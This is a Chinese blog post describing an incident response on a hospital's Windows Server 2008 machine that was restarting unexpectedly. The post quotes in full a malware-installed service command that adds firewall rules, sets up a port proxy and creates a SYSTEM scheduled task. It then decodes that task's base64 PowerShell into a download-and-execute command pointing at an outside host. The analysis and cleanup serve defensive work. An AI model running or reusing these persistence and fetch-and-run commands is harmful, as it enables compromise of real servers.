Windows server2008服务器异常重启

最新推荐文章于 2024-05-21 16:42:40 发布
最新推荐文章于 2024-05-21 16:42:40 发布
阅读量1.2w 收藏 7
点赞数
分类专栏: Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014710633/article/details/89229063
版权


早上接到电话,昨天下午某医院一台Windows server2008服务器异常重启

系统日志里面 在服务器重启之前 有一条错误信息和一条正常信息

正常信息:
服务已安装在系统中。

服务名称: ASEXGYDVQGUCOASATURE
服务文件名: %COMSPEC% /C "netsh.exe firewall add portopening tcp 65353 DNS&netsh interface portproxy add v4tov4 listenport=65353 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn Sync /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA=" /F &schtasks /run /tn Sync"
服务类型: 用户模式服务
服务启动类型: 按需启动
服务帐户: LocalSystem

错误信息:
等待 ASEXGYDVQGUCOASATURE 服务的连接超时(30000 毫秒)。

之后就是服务器重启信息 特别注意到这条
进程 wininit.exe 为用户  开始计算机 HUAWEI1 的 重新启动,原因如下: 没有找到这个原因的标题
 原因代码: 0x50006
 关机类型: 重新启动
 注释: 系统进程 C:\Windows\system32\lsass.exe 意外终止,状态码为 255。系统现在将关机,并重新启动。
 
这个报错信息我很熟悉!之前在其他医院服务器上也见过,是木马利用系统进程wininit.exe重启服务器,从这个报错信息我就基本上确定服务器是中病毒了

然后我又回头看了下之前的那个正常信息
服务名称: ASEXGYDVQGUCOASATURE,为随机的字符串。
%COMSPEC% /C "netsh.exe firewall add portopening tcp 65353 DNS&netsh interface portproxy add v4tov4 listenport=65353 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn Sync /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA=" /F &schtasks /run /tn Sync"

 %COMSPEC%=C:\Windows\system32\cmd.exe
然后命令分为:
netsh.exe firewall add portopening tcp 65353 DNS
netsh interface portproxy add v4tov4 listenport=65353 connectaddress=1.1.1.1 connectport=53
schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn Sync /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA=" /F 
schtasks /run /tn Sync

大概意思是 去cmd里执行
1.开65353端口


2.开启代理,做端口转发,如果有socket连接到65353端口时,本机就连接到1.1.1.1的53端口


3.添加定时计划任务Sync 7点开始 40min一次 执行"powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA="
4.启用这个Sync任务
(schtask 命令详解:https://www.cnblogs.com/yumianhu/p/3710743.html)

果真 去任务计划程序里面找到了这个Sync任务。

网上百度了一下 说这个powershell后面这一长串命令是经过Base64编码的数据 可以用python解密 遂试了一下

>>> import base64
>>> code="SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA="
>>> base64.b64decode(code).decode('UTF16')
"IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?smb')"

"IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?smb')"---这个好像是下载一个东西

做了如下处理:
1.删除了端口转发 netsh interface portproxy delete v4tov4 listenport=65353 listenaddress=* 
2.本地计算机策略--计算机配置--Windows设置--安全设置--ip安全设置里 禁用的65535和445端口(因为我netstat -ano看到了很多445 syn_sent)

这个msdtc.exe 是sqlserver的服务进程  我没敢kill。 
3.通知医院

参考:
https://www.freebuf.com/column/183705.html
https://www.sohu.com/a/198999800_750628

jzzw
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务器晚上自动重启是什么原因,服务器经常自动重启是什么原因
weixin_34666478的博客
07-29 798
邰寻蕊2017-06-26 23:44可能中病毒了 rpc服务意外终止,系统重启问题 1.第一种情况,可能是中毒引起的,杀毒、打上冲击波、振荡波的补丁 2.第二种情况,一般都是IE组件在注册表中注册信息被破坏,可以按下面的方法去解决该问题: (1).在\"开始\"菜单中打开\"运行\"窗口,在其中输入\"regsvr32 actxprxy.dll\",然后\"确定\",接着会出现一个信息对话 框\...
计算机0x50006错误,Windows has encountered a critical problem and will restart automatically in one minute...
weixin_39859988的博客
07-28 2648
Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now'当错误对话框“Windows has encountered a critical problem and will restart automatically in o...
服务器无故重启是什么原因
最新发布
恒创科技Henghost
05-21 611
要解决这个问题,首先应该收集详细的日志信息,包括系统日志、硬件监测记录等,并进行故障排除。可能需要通过更换硬件、更新驱动程序、重新配置系统设置或者进行病毒扫描等方式来确定具体的故障原因。如果无法确定原因,可能需要联系专业技术人员或者服务器制造商的技术支持服务来获取帮助。服务器无故重启可能是由多种原因导致的,包括硬件问题、软件问题、电源问题、热插拔组件问题等。
计算机0x50006错误,windows-server-2012 – Server 2012陷入重启循环 – lsass.exe失败
weixin_35717696的博客
07-28 1377
此错误是由LastPass引起的. LastPass使用的登录挂钩似乎与Windows服务器变体不兼容 – 导致lsass.exe崩溃.请注意应用程序事件日志中的以下相关错误消息(事件ID:1000):Faulting application name: lsass.exe,version: 6.3.9600.17415,time stamp: 0x545042feFaulting module...
计算机0x50006错误,你们安装win8使用崩溃多少次
weixin_39947501的博客
07-28 571
级别 日期和时间 来源 事件 ID 任务类别错误 2011/9/18 星期日 7:35:02 Microsoft-Windows-WMPNSS-Service 14346 无 新的媒体服务器未初始化,因为 RegisterRunningDevice() 遇到错误“0x800...
Windows Server 1月更新会导致域控制器频繁重启,Hyper-V无法启动
par@ish的博客
01-13 2290
本周微软发布了 Windows Server 2012 R2 KB5009624 更新、Windows Server 2019 KB5009557 更新和 Windows Server 2022 KB5009555 更新 。原本是为了解决Windows Server中、用于修改LDAP参数时的Active Directory (AD)属性设计不当引发的安全问题,但却引发Windows域控制器不断重启、。 看起来 KB5009557 (2019) 和 KB5009555 (2022) 会导致域控制器出现故障,
SAP原因代码
热门推荐
少年休闲海
12-01 1万+
根据最佳业务实践,使用原因代码来代表现金流量表项目。 当使用现金和银行科目过账时必须指定原因代码来代表此现金流入或流出对应的现金流量表项目。这样通过直接法可以跟踪每笔现金和银行业务的流动情况,得到现金流量表。这种出示现金流量表的方式要求每笔现金和银行科目过账都必须由财务人员判断并分配一个原因代码,并且要求企业现金和银行收支业务必须按现金流量表项目分开,不能混合,从而保证记账时在行项目上分清现
还原永恒之蓝下载器PS脚本混淆
Sven的忘却日记
04-26 5985
注意:以下代码为真实永恒之蓝木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
win2012r服务器系统,windows server 2012R 服务器 异常频繁重启
weixin_34722760的博客
08-05 3427
各位大神,小弟我碰到 Windows server 2012R2服务器 莫名其妙 频繁重启的问题,还请大神们帮我分析一下问题原因及解决办法。报错日志截图如下:Memory.dmpMicrosoft (R) Windows Debugger Version 6.3.9600.17336 AMD64Copyright (c) Microsoft Corporation. All rights res...
windows 注册Nginx为服务,自动重启
04-02
Windows系统中,Nginx是一个广泛使用的开源Web服务器,常用于反向代理、负载均衡和静态内容服务。为了确保Nginx在系统启动时自动运行,并在异常情况下能够自动重启,我们需要将其注册为Windows服务。这个过程涉及...
Windows网络服务器配置-基本磁盘管理.ppt
11-01
Windows Server 2016网络服务器配置中,磁盘管理是至关重要的环节,它涉及到服务器的数据存储、读写性能以及容错能力。本部分主要介绍如何管理和配置基本磁盘和动态磁盘,以满足ABC公司文件服务器的空间扩展需求。...
安装WindowsServer2008EnterpriseEdition.pdf
10-02
在本教程中,我们将深入探讨如何安装Windows Server 2008 Enterprise Edition,这是一个专为大型企业设计的强大服务器操作系统。这个过程包括从安装媒体启动、系统配置、初始设置以及一些额外的步骤,以确保服务器...
Windows服务器巡检报告.doc
12-11
Windows服务器巡检报告是IT运维中的重要环节,其目的是确保服务器稳定、高效地运行,防止潜在问题导致的服务中断。巡检工作涵盖了多个方面,包括硬件、操作系统、性能和安全检查。 首先,服务器物理硬件的巡检是...
win2008服务器安全设置集锦.pdf
06-27
Windows Server 2008 服务器安全设置详解》 Windows Server 2008作为一款企业级操作系统,虽然在安全性能上相比前代有了显著提升,但面对日益严峻的网络安全环境,仅靠系统自带的安全机制是远远不够的。本文将...
SAP 原因代码的两种配置优缺点
我好像病了的博客
10-11 8481
SAP 原因代码的两种配置优缺点
关键系统进程 C:\Windows\system32\lsass.exe 失败,状态代码是 255。现在必须重新启动计算机。
plan1990的博客
09-03 1万+
关键系统进程 C:\Windows\system32\lsass.exe 失败,状态代码是 255。现在必须重新启动计算机。 错误应用程序名称: lsass.exe,版本: 6.1.7600.16385,时间戳: 0x4a5bc155 错误模块名称: unknown,版本: 0.0.0.0,时间戳: 0x00000000 异常代码: 0xc0000005 错误偏移量: 0x0000000070e8...
CSDN博客图片服务器异常的艰辛排查与处理-上传文件时发生 HTTP 错误(错误代码:502)的解决办法
Spring Boot-Common On With You
03-18 7741
问题描述: 关于这个问题是在写博客的时候遇到的,在利用项目的空余时间,像平时一样打开CSDN博客,进行写作,但是在上传图片时出现了异常 “上传文件时发生 HTTP 错误(错误代码:502) ” 的错误,如下图: 然后就进行了各种尝试,什么清除缓存、电脑重启、网络更换、更换电脑登录再次写作呀什么的,各种倒腾,本来空余时间就少,难得有这么个空余时间用来写作,我。。。真的是心中一万匹野马在...
转载--无弹窗APT渗透实验
weixin_30321449的博客
03-20 365
转载--无弹窗APT渗透实验 文章作者:亚信安全,转载自 FreeBuf.COM APT攻击方式花样繁多,我研究最近的流行的APT攻击方式,在本地搭建环境模拟一次简单的APT攻击,在模拟攻击过程中发现网上公布的poc都会有大大小的缺陷,大多数poc执行过程中都会弹出一闪而过的黑框框,我深入分析这些脚本,修改其中的代码,使其执行的过程中消除那个一闪而过的黑框框,从而让中招的不会轻易产生怀疑。我...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值